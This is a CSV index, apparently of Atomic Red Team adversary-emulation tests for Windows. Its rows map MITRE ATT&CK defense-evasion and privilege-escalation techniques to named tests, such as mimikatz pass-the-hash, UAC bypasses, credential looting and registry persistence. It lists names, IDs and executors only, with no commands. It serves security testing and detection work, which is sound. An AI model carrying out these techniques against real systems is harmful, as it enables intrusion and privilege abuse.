defense-evasion,T1027,Obfuscated Files or Information,8,Obfuscated Command Line using special Unicode characters,e68b945c-52d0-4dd9-a5e8-d173d70c448f,manual
defense-evasion,T1027,Obfuscated Files or Information,9,Snake Malware Encrypted crmlog file,7e47ee60-9dd1-4269-9c4f-97953b183268,powershell
defense-evasion,T1027,Obfuscated Files or Information,10,Execution from Compressed JScript File,fad04df1-5229-4185-b016-fb6010cd87ac,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,1,Register Portable Virtualbox,c59f246a-34f8-4e4d-9276-c295ef9ba0dd,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,2,Create and start VirtualBox virtual machine,88b81702-a1c0-49a9-95b2-2dd53d755767,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,3,Create and start Hyper-V virtual machine,fb8d4d7e-f5a4-481c-8867-febf13f8b6d3,powershell
defense-evasion,T1134.005,Access Token Manipulation: SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,1,Regsvr32 local COM scriptlet execution,449aa403-6aba-47ce-8a37-247d21ef0306,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,2,Regsvr32 remote COM scriptlet execution,c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,3,Regsvr32 local DLL execution,08ffca73-9a3d-471a-aeb0-68b4aa3ab37b,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,4,Regsvr32 Registering Non DLL,1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,5,Regsvr32 Silent DLL Install Call DllRegisterServer,9d71c492-ea2e-4c08-af16-c6994cdf029f,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,1,Masquerading as Windows LSASS process,5ba5a3d1-cf3c-4499-968a-a93155d1f717,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,3,Masquerading - cscript.exe running as notepad.exe,3a2a578b-0a01-46e4-92e3-62e2859b42f0,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,4,Masquerading - wscript.exe running as svchost.exe,24136435-c91a-4ede-9da1-8b284a1c1a23,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,5,Masquerading - powershell.exe running as taskhostw.exe,ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,6,Masquerading - non-windows exe running as windows exe,bc15c13f-d121-4b1f-8c7d-28d95854d086,powershell
defense-evasion,T1036.003,Masquerading: Rename System Utilities,7,Masquerading - windows exe running as different windows exe,c3d24a39-2bfe-4c6a-b064-90cd73896cb0,powershell
defense-evasion,T1036.003,Masquerading: Rename System Utilities,8,Malicious process Masquerading as LSM.exe,83810c46-f45e-4485-9ab6-8ed0e9e6ed7f,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,9,File Extension Masquerading,c7fa0c3b-b57f-4cba-9118-863bf4e653fc,command_prompt
defense-evasion,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
defense-evasion,T1218.009,Signed Binary Proxy Execution: Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt
defense-evasion,T1218.009,Signed Binary Proxy Execution: Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,4,Install root CA on Windows,76f49d86-5eb1-461a-a032-a480f86652f1,powershell
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,5,Install root CA on Windows with certutil,5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f,powershell
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,6,Add Root Certificate to CurrentUser Certificate Store,ca20a3f1-42b5-4e21-ad3f-1049199ec2e0,powershell
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell
defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
defense-evasion,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
defense-evasion,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
defense-evasion,T1127.001,Trusted Developer Utilities Proxy Execution: MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
defense-evasion,T1127.001,Trusted Developer Utilities Proxy Execution: MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
defense-evasion,T1027.006,HTML Smuggling,1,HTML Smuggling Remote Payload,30cbeda4-08d9-42f1-8685-197fad677734,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,7,Delete an entire folder - Windows PowerShell,edd779e4-a509-4cba-8dfa-a112543dbfb1,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,9,Delete Prefetch File,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
defense-evasion,T1221,Template Injection,1,WINWORD Remote Template Injection,1489e08a-82c7-44ee-b769-51b72d03521d,command_prompt
defense-evasion,T1550.002,Use Alternate Authentication Material: Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
defense-evasion,T1550.002,Use Alternate Authentication Material: Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
defense-evasion,T1550.002,Use Alternate Authentication Material: Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
defense-evasion,T1574.002,Hijack Execution Flow: DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
defense-evasion,T1574.002,Hijack Execution Flow: DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca23bfb2-023f-49c5-8802-e66997de462d,command_prompt
defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt
defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt
defense-evasion,T1220,XSL Script Processing,4,WMIC bypass using remote XSL file,7f5be499-33be-4129-a560-66021f379b9b,command_prompt
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,3,Create Windows System File with Attrib,f70974c8-c094-4574-b542-2c545af95a32,command_prompt
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,4,Create Windows Hidden File with Attrib,dadb792e-4358-4d8d-9207-b771faa0daa5,command_prompt
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,8,Hide Files Through Registry,f650456b-bd49-4bc1-ae9d-271b5b9581e7,command_prompt
defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,1,Alternate Data Streams (ADS),8822c3b0-d9f9-4daf-a043-49f4602364f4,command_prompt
defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,2,Store file in Alternate Data Stream (ADS),2ab75061-f5d5-4c1a-b666-ba2a50df5b02,powershell
defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,3,Create ADS command prompt,17e7637a-ddaf-4a82-8622-377e20de8fdb,command_prompt
defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,4,Create ADS PowerShell,0045ea16-ed3c-4d4c-a9ee-15e44d1560d1,powershell
defense-evasion,T1055.001,Process Injection: Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
defense-evasion,T1055.001,Process Injection: Dynamic-link Library Injection,2,WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique,8b56f787-73d9-4f1d-87e8-d07e89cbc7f5,powershell
defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
defense-evasion,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
defense-evasion,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
defense-evasion,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,1,Lolbin Jsc.exe compile javascript to exe,1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8,command_prompt
defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,2,Lolbin Jsc.exe compile javascript to dll,3fc9fea2-871d-414d-8ef6-02e85e322b80,command_prompt
defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,8,Import XML Schedule Task with Hidden Attribute,cd925593-fbb4-486d-8def-16cbdf944bf4,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,9,PowerShell Modify A Scheduled Task,dda6fc7b-c9a6-4c18-b98d-95ec6542af6d,powershell
privilege-escalation,T1546.013,Event Triggered Execution: PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,10,UACME Bypass Method 23,8ceab7a2-563a-47d2-b5ba-0995211128d7,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,11,UACME Bypass Method 31,b0f76240-9f33-4d34-90e8-3a7d501beb15,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,12,UACME Bypass Method 33,e514bb03-f71c-4b22-9092-9f961ec6fb03,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,13,UACME Bypass Method 34,695b2dac-423e-448e-b6ef-5b88e93011d6,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,14,UACME Bypass Method 39,56163687-081f-47da-bb9c-7b231c5585cf,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,18,WinPwn - UAC Magic,964d8bf8-37bc-4fd3-ba36-ad13761ebbcc,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,19,WinPwn - UAC Bypass ccmstp technique,f3c145f9-3c8d-422c-bd99-296a17a8f567,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,20,WinPwn - UAC Bypass DiskCleanup technique,1ed67900-66cd-4b09-b546-2a0ef4431a0c,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,21,WinPwn - UAC Bypass DccwBypassUAC technique,2b61977b-ae2d-4ae4-89cb-5c36c89586be,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,22,Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key,251c5936-569f-42f4-9ac2-87a173b9e9b8,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,23,UAC Bypass with WSReset Registry Modification,3b96673f-9c92-40f1-8a3e-ca060846f8d9,powershell
privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
privilege-escalation,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
privilege-escalation,T1547.014,Active Setup,1,HKLM - Add atomic_test key to launch executable as part of user setup,deff4586-0517-49c2-981d-bbea24d48d71,powershell
privilege-escalation,T1547.014,Active Setup,2,HKLM - Add malicious StubPath value to existing Active Setup Entry,39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a,powershell
privilege-escalation,T1547.014,Active Setup,3,HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number,04d55cef-f283-40ba-ae2a-316bc3b5e78c,powershell
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,5,Remote Service Installation CMD,fb4151a2-db33-4f8c-b7f8-78ea8790f961,command_prompt
privilege-escalation,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
privilege-escalation,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
privilege-escalation,T1547.010,Boot or Logon Autostart Execution: Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
privilege-escalation,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
privilege-escalation,T1055,Process Injection,3,Section View Injection,c6952f41-6cf0-450a-b352-2ca8dae7c178,powershell
privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
privilege-escalation,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
privilege-escalation,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
privilege-escalation,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
privilege-escalation,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
privilege-escalation,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
privilege-escalation,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
privilege-escalation,T1547.003,Time Providers,1,Create a new time provider,df1efab7-bc6d-4b88-8be9-91f55ae017aa,powershell
privilege-escalation,T1547.003,Time Providers,2,Edit an existing time provider,29e0afca-8d1d-471a-8d34-25512fc48315,powershell
privilege-escalation,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
privilege-escalation,T1134.002,Create Process with Token,2,WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique,ccf4ac39-ec93-42be-9035-90e2f26bcd92,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,4,Winlogon HKLM Shell Key Persistence - PowerShell,95a3c42f-8c88-4952-ad60-13b81d929a9d,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,5,Winlogon HKLM Userinit Key Persistence - PowerShell,f9b8daff-8fa7-4e6a-a1a7-7c14675a545b,powershell
privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
privilege-escalation,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,4,Bad Potato,9c6d799b-c111-4749-a42f-ec2f8cb51448,powershell
privilege-escalation,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
privilege-escalation,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell
privilege-escalation,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,3,Windows MOFComp.exe Load MOF File,29786d7e-8916-4de6-9c55-be7b093b2706,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
privilege-escalation,T1546.001,Event Triggered Execution: Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,10,Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value,acfef903-7662-447e-a391-9c91c2f00f7b,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,11,Change Startup Folder - HKCU Modify User Shell Folders Startup Value,8834b65a-f808-4ece-ad7e-2acdf647aafa,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,12,HKCU - Policy Settings Explorer Run Key,a70faea1-e206-4f6f-8d9a-67379be8f6f1,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,13,HKLM - Policy Settings Explorer Run Key,b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,14,HKLM - Append Command to Winlogon Userinit KEY Value,f7fab6cc-8ece-4ca7-a0f1-30a22fccd374,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,15,HKLM - Modify default System Shell - Winlogon Shell KEY Value ,1d958c61-09c6-4d9e-b26b-4130314e520e,powershell
